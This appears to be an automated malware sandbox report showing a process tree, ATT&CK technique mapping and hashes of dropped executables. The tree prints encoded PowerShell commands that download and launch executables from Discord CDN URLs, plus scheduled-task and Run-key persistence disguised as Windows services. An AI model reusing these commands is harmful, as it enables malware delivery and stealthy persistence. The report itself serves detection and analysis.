ADwAIwBtAHMAdAAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:708

C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:3344

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\bg3mx31Wve.exe
6⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\bg3mx31Wve.exe
C:\Users\Admin\AppData\Local\Temp\bg3mx31Wve.exe
7⤵
- Executes dropped EXE
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
- Suspicious use of WriteProcessMemory
PID:4988

C:\Users\Admin\AppData\Roaming\10.exe
"C:\Users\Admin\AppData\Roaming\10.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4420

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:2120

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:4968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:1860

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0St4MK0NOU.exe
6⤵
PID:3848

C:\Users\Admin\AppData\Local\Temp\0St4MK0NOU.exe
C:\Users\Admin\AppData\Local\Temp\0St4MK0NOU.exe
7⤵
- Executes dropped EXE
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADkAMQAwADUAMwAzADEAMwAxAC8AQwBSAC4AZQB4AGUAJwAsACAAPAAjAGEAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBmAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAzAC4AZQB4AGUAJwApACkAPAAjAGoAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB0AGQAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADMALgBlAHgAZQAnACkAPAAjAHoAegBsACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Users\Admin\AppData\Roaming\13.exe
"C:\Users\Admin\AppData\Roaming\13.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:2276

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:3940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:2720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:1884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5116

C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\AppData\Roaming\MONTIONHYPER.SLN"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3040

C:\Users\Admin\AppData\Local\Temp\3YxovXoRd8.exe
C:\Users\Admin\AppData\Local\Temp\3YxovXoRd8.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
- Blocklisted process makes network request
PID:1900

C:\Users\Admin\AppData\Roaming\3.exe
C:\Users\Admin\AppData\Roaming\3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1784

C:\Users\Admin\AppData\Roaming\6.exe
C:\Users\Admin\AppData\Roaming\6.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:728

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4748.0.1748932738\360775143" -parentBuildID 20200403170909 -prefsHandle 1544 -prefMapHandle 1536 -prefsLen 1 -prefMapSize 219938 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4748 "\\.\pipe\gecko-crash-server-pipe.4748" 1624 gpu
3⤵
PID:4648

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4748.3.1899880219\142703374" -childID 1 -isForBrowser -prefsHandle 2212 -prefMapHandle 2208 -prefsLen 156 -prefMapSize 219938 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4748 "\\.\pipe\gecko-crash-server-pipe.4748" 1460 tab
3⤵
PID:1888

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4748.13.998865586\824604134" -childID 2 -isForBrowser -prefsHandle 3440 -prefMapHandle 3436 -prefsLen 6938 -prefMapSize 219938 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4748 "\\.\pipe\gecko-crash-server-pipe.4748" 3448 tab
3⤵
PID:4480

C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64-Setup.exe
"C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64-Setup.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2200

C:\Users\Admin\AppData\Local\Temp\nstF1F9.tmp\Everything\Everything.exe
"C:\Users\Admin\AppData\Local\Temp\nstF1F9.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1496

C:\Program Files\Everything\Everything.exe
"C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
PID:328

C:\Program Files\Everything\Everything.exe
"C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033
2⤵
- Executes dropped EXE
PID:4332

C:\Program Files\Everything\Everything.exe
"C:\Program Files\Everything\Everything.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1416

C:\Program Files\Everything\Everything.exe
"C:\Program Files\Everything\Everything.exe" -svc
1⤵
- Executes dropped EXE
PID:3036

C:\Users\Admin\AppData\Roaming\11.exe
C:\Users\Admin\AppData\Roaming\11.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:2400

C:\Users\Admin\AppData\Roaming\12.exe
C:\Users\Admin\AppData\Roaming\12.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1504

C:\Users\Admin\AppData\Roaming\3.exe
C:\Users\Admin\AppData\Roaming\3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:3788

C:\Users\Admin\AppData\Roaming\6.exe
C:\Users\Admin\AppData\Roaming\6.exe
1⤵
- Executes dropped EXE
PID:2700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
010c219c46b4439bc787644989e20389

SHA1
f3a63066ab4446458bd6417386777e39e09b9b25

SHA256
2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

SHA512
c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5.exe.log
Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
2KB

MD5
f5764e98a56d8840ca9a21c15eadbb7f

SHA1
886a1e454e60d60857854887f7c268f9bb64fbc9

SHA256
09d074fcf2dbe264b88fd51ca956eb293812b3c73cd21332b7624f38128074c8

SHA512
07f43a2ed2864005fae976d15f38200b6cbd6c0fe9fe4d33dc82158df42b3a92e0f4c425aceaf1a06dfad2913e0b44ee5862af1286c4898df436004e9adede48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
4ab18dd421d2c20960bae25073094c10

SHA1
1081f2c1f9f3256a0a52b665951fa434d69ea564

SHA256
37a785a5ea122b5d45e4790e37511a55ab4ae0fba265357767ee51cdc2492925

SHA512
4c4098689a55f6af82b042c95bf117d7ac1542d4c504651771223b399498f8fadab9f6fdfa70db12fb0652396482b7a0ffeb4d500734c655ab277b3a221ef67c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
02ca738115af60fbdb3a162c31945e0d

SHA1
c3ca6d8dcbe57cfd47967b8c21ca11a22572c173

SHA256
2240685f1e3217940da47351847246762739626a71693fc3d5e076db6b05080f

SHA512
9ec1e8f1331efc12c10f79ca510a39f41b73c6ca7c3c9a861abc9934f4e6f0d04229c321a5de73846afcfa4c12e7de588f8a652f0c65368276b20bc91b6783c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9a5b579c5905971437c43f2fe163d9f1

SHA1
fe9b040124e90490cfc7dc8e6a35157953b4d8f8

SHA256
5f2af69f8f64d7feaa47821cc2d46937eac2f83df887792e3e5568f5c0514b6d

SHA512
fc3a1da7c48325b753d4ba2f42106543d0079704daafab7c71462f086764c1a9a0f8a893b59c137640979ba143f13ba1e22f670ea031a198cd74da6bb21c92c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9a5b579c5905971437c43f2fe163d9f1

SHA1
fe9b040124e90490cfc7dc8e6a35157953b4d8f8

SHA256
5f2af69f8f64d7feaa47821cc2d46937eac2f83df887792e3e5568f5c0514b6d

SHA512
fc3a1da7c48325b753d4ba2f42106543d0079704daafab7c71462f086764c1a9a0f8a893b59c137640979ba143f13ba1e22f670ea031a198cd74da6bb21c92c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7c03098cf3ceee3ba78871e1cefafe0a

SHA1
e50a81d2797dbc7e9ff77b132980dee0c3ceba78

SHA256
019a8f18cd8c8c4f22ac310e972bc1214c194f80278cb9ee23215d89130fa3ff

SHA512
2d688723e16e0e3f0e025df1eaf172ce7c3878739722b3262ae5eb5e1403eaf621b75214dbf34ec789dee9531f3ed11dd2afa148014da627a1d24ccc2688ed25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
882a8d25343c8220cc6deba7a1eeda32

SHA1
869226ad86fe3b0e0bd23b9ad8ec9a3d9c52e566

SHA256
3bcd70adbd84e41e01fb86c117e04205d150d0fc17169cf26b50ec387ea485ba

SHA512
66bd1eebb0e331bb8a825831a92f4702be65fa36fc43433ac886240d7bdde95dadc329f23acd1ef825736e124e58cdbe21262ab0e339122cfeea49a16e203c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a8d719c1f740efa3b36abf19635c3f2a

SHA1
ec08563e00156572a9b75dbeef52c8185ece8abe

SHA256
171e5b5596cf20b2c0d5c406b348800359b10c50f1a70110472d540ab307a9ca

SHA512
389939cca772810c7c9e19f4137254015e3aeb46b31fc3caf10856ea86ebf7b24d84dcf3ff783d415a2852a95d843c41d04334f6c7ff62d2eeaccab830797af1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
259423b3548aee44206c77bb6a0ac05b

SHA1
b7e48333d741008c63f47a09d71205e216b04c4d

SHA256
83cb8a4aa68bd3f94a6e2b4369ef0f8deebc504e31382393d60f8fb911f3db12

SHA512
2fd43122d77fbdabe766674cf6b81c6ac1b5924acb75e33a1267f06a82fe590779172e89f1a9a80ca18217b7518842d32a6a8e380785fb17a8299d9e493d353f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6af2462a9cacb10160710515e05c7dcc

SHA1
611e94add3e628a6c7bee644f97fdb1fb0e98c78

SHA256
e9f1b6897520841e295f723c2f0352804c3b1ff4206abc06dfa52061a9b0213b

SHA512
4d79fa7a9330af7bf60bbc984851199a2dacd260cebc32b18feb51a98bb782fd116107a238bc7c2698b94c35410f51061e9c1b0cc9fb497e887105f29911015d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
316c95158d702db1f74fecb637b49f52

SHA1
1914ab75d0eadf433c45c3b178e424e5076f086f

SHA256
488ba39ba75c6797dfebf18264c3ccf1cb82572a12a988e435e8f7a0466d5eba

SHA512
9914fd4b45fcf041c1e29fdf61b2229fe52e9d5e973ff439f5dd52fe7f35cba7a7378d05672e82f9cb81ab4ef21a18c4fc9cac59a1be361516205047faa099a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
539KB

MD5
1137589aa44bf2facb839b4a4abcb941

SHA1
7f86e36f26d36a2a9e4adac82a29668f8a4aab5c

SHA256
715455aef5e60b76962c64b6a1f1507d07566abc220c624c03b47b90e3cb4921

SHA512
60b9490cbddb1ea965a25ccb2996cde646605b1e05558426f7426cd980710638b690bfe18d5f589c67f881a6ac670b77a57a5dbfc89698cf01ad5711cbbf32ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
539KB

MD5
1137589aa44bf2facb839b4a4abcb941

SHA1
7f86e36f26d36a2a9e4adac82a29668f8a4aab5c

SHA256
715455aef5e60b76962c64b6a1f1507d07566abc220c624c03b47b90e3cb4921

SHA512
60b9490cbddb1ea965a25ccb2996cde646605b1e05558426f7426cd980710638b690bfe18d5f589c67f881a6ac670b77a57a5dbfc89698cf01ad5711cbbf32ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\0St4MK0NOU.exe
Filesize
5KB

MD5
335ebfd3421b0c58c258bbff94fd7f9d

SHA1
164f6cb1b5bc5c0905de512d355363705cd62154

SHA256
02fa44b9687f061867ed258f14e0542ba8c3af5db68f69fda02c94b73cd9568b

SHA512
51714c30b8b9d76cc5e455657d142b31da378d3c244b646ff1d5968b167d9147f37a839076d957395f6fadece78724f5d15694e59eb1d524643e245e4d8cc13e

Download Submit
C:\Users\Admin\AppData\Local\Temp\0St4MK0NOU.exe
Filesize
5KB

MD5
335ebfd3421b0c58c258bbff94fd7f9d

SHA1
164f6cb1b5bc5c0905de512d355363705cd62154

SHA256
02fa44b9687f061867ed258f14e0542ba8c3af5db68f69fda02c94b73cd9568b

SHA512
51714c30b8b9d76cc5e455657d142b31da378d3c244b646ff1d5968b167d9147f37a839076d957395f6fadece78724f5d15694e59eb1d524643e245e4d8cc13e

Download Submit
C:\Users\Admin\AppData\Local\Temp\3YxovXoRd8.exe
Filesize
130KB

MD5
5cfc262781b442485c41919bc53cd53b

SHA1
acd6a245a1fd5448bccb7f6874a237146fd934dc

SHA256
b3602a1400182176db1ed1fb4591beda3b478b25e60bf72f5534590f5d69c6ba

SHA512
1705a9d7e33df193a709eda84547c3879276aa238f80bf8422999ec40362bda61d930d8da483e26e52d2061351740581f34703689b057a74ff911cba357fad81

Download Submit
C:\Users\Admin\AppData\Local\Temp\3YxovXoRd8.exe
Filesize
130KB

MD5
5cfc262781b442485c41919bc53cd53b

SHA1
acd6a245a1fd5448bccb7f6874a237146fd934dc

SHA256
b3602a1400182176db1ed1fb4591beda3b478b25e60bf72f5534590f5d69c6ba

SHA512
1705a9d7e33df193a709eda84547c3879276aa238f80bf8422999ec40362bda61d930d8da483e26e52d2061351740581f34703689b057a74ff911cba357fad81

Download Submit
C:\Users\Admin\AppData\Local\Temp\3wPKIsr8zP.exe
Filesize
5KB

MD5
ed22ee48c0ee14f1edbddbabb1e7dc5f

SHA1
02ff5032dee157839a478bfa01e059a9e268de46

SHA256
3d2f71623a64d46281a96a3ed92fb0edb893e1a4798a2700ea1c1a406fd6b297

SHA512
e52c765fefeb5b4510513c09ee9677b0103e9b959f64237415258d731cc35389529f7e47967743847be124144779c37ccee6686c80f73c7ac5f1fb969ecbbaee

Download Submit
C:\Users\Admin\AppData\Local\Temp\3wPKIsr8zP.exe
Filesize
5KB

MD5
ed22ee48c0ee14f1edbddbabb1e7dc5f

SHA1
02ff5032dee157839a478bfa01e059a9e268de46

SHA256
3d2f71623a64d46281a96a3ed92fb0edb893e1a4798a2700ea1c1a406fd6b297

SHA512
e52c765fefeb5b4510513c09ee9677b0103e9b959f64237415258d731cc35389529f7e47967743847be124144779c37ccee6686c80f73c7ac5f1fb969ecbbaee

Download Submit
C:\Users\Admin\AppData\Local\Temp\D0Z5QHdkzo.exe
Filesize
5KB

MD5
a7863fd82f651d44d6dbd17d920d4eb7

SHA1
69d259e1cbc0d4108276815f6bc55dd8274e2830

SHA256
8e3963d762b35218c2f5388dd93a19793cbf79548130f2fa7e6f732d8df12bb7

SHA512
90a2003baeedfb4a715ef2b934550e3b8cd3f93a234933025e98c1c4862919efa30009b9370748531bb8bfae58706830f719aadf20e44ad62ef6542a8309c940

Download Submit
C:\Users\Admin\AppData\Local\Temp\D0Z5QHdkzo.exe
Filesize
5KB

MD5
a7863fd82f651d44d6dbd17d920d4eb7

SHA1
69d259e1cbc0d4108276815f6bc55dd8274e2830

SHA256
8e3963d762b35218c2f5388dd93a19793cbf79548130f2fa7e6f732d8df12bb7

SHA512
90a2003baeedfb4a715ef2b934550e3b8cd3f93a234933025e98c1c4862919efa30009b9370748531bb8bfae58706830f719aadf20e44ad62ef6542a8309c940

Download Submit
C:\Users\Admin\AppData\Local\Temp\EWMQ2uDJM9.exe
Filesize
5KB

MD5
fea013218944957fc9af744b5d833604

SHA1
402b3a6a1284d8cf2b0e11525b53f60d2fa602fa

SHA256
bfb525f063e2332edf29c33912de7619ac58916e9935c11bf568b534ef1a46b3

SHA512
59ac1511166e60840f46f2f747f0a3a4d4421653cc9ade60dbcc589e1e6414487672b9d0d9a127b2b206bb5b5891c7991f8f66def799af444f88c8ce3178f80f

Download Submit
C:\Users\Admin\AppData\Local\Temp\EWMQ2uDJM9.exe
Filesize
5KB

MD5
fea013218944957fc9af744b5d833604

SHA1
402b3a6a1284d8cf2b0e11525b53f60d2fa602fa

SHA256
bfb525f063e2332edf29c33912de7619ac58916e9935c11bf568b534ef1a46b3

SHA512
59ac1511166e60840f46f2f747f0a3a4d4421653cc9ade60dbcc589e1e6414487672b9d0d9a127b2b206bb5b5891c7991f8f66def799af444f88c8ce3178f80f

Download Submit
C:\Users\Admin\AppData\Local\Temp\G6MrYvNp7T.exe
Filesize
6KB

MD5
014ffb711c0211b3483bf85d9f4b24df

SHA1
a2fd52a24ad614a9d8519d6f81938121fad2785c

SHA256
14de357ef442874dc50389ddd9cee91397dcb9b5c1b0d6f54ae714cc5cc852ba

SHA512
57ba725667fc6f9ee903fb78945488e5f50d833900ae772af88a1581d121f73d8351490dcd41e1eeea9943d4d2713aa550011db8ad8c6eeff030bc7e041b91f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\G6MrYvNp7T.exe
Filesize
6KB

MD5
014ffb711c0211b3483bf85d9f4b24df

SHA1
a2fd52a24ad614a9d8519d6f81938121fad2785c

SHA256
14de357ef442874dc50389ddd9cee91397dcb9b5c1b0d6f54ae714cc5cc852ba

SHA512
57ba725667fc6f9ee903fb78945488e5f50d833900ae772af88a1581d121f73d8351490dcd41e1eeea9943d4d2713aa550011db8ad8c6eeff030bc7e041b91f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kg1Z9jLcrT.exe
Filesize
5KB

MD5
6c15c7029783f0346c38ae0bbc05a841

SHA1
4e83201b3781b180694399dec65870142f2fc510

SHA256
f24ef9d438c83af3a2b6d5499269b56996145bf8ca5c033f2706e236db00dfeb

SHA512
e7f454fe96f15f26b6d6d58cc4ec8e30aa8f72c4914c16559f6dd128d557b287fc2226e7ac87098272eee252a615cc2bf589910b0d29da856bb8927e916e1a7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kg1Z9jLcrT.exe
Filesize
5KB

MD5
6c15c7029783f0346c38ae0bbc05a841

SHA1
4e83201b3781b180694399dec65870142f2fc510

SHA256
f24ef9d438c83af3a2b6d5499269b56996145bf8ca5c033f2706e236db00dfeb

